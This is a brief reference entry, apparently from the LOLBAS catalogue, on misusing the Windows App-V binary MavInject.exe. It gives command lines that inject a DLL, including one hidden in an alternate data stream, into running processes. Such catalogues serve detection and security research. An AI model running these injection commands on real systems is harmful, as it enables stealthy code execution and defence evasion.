Used by App-v in Windows
The LOLBAS can achieve abritrary code execution.
Inject evil.dll into a process with PID 3110.Usecase:Inject dll file into running process
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
The LOLBAS can write or read alternate data streams.
Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172Usecase:Inject dll file into running process
Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"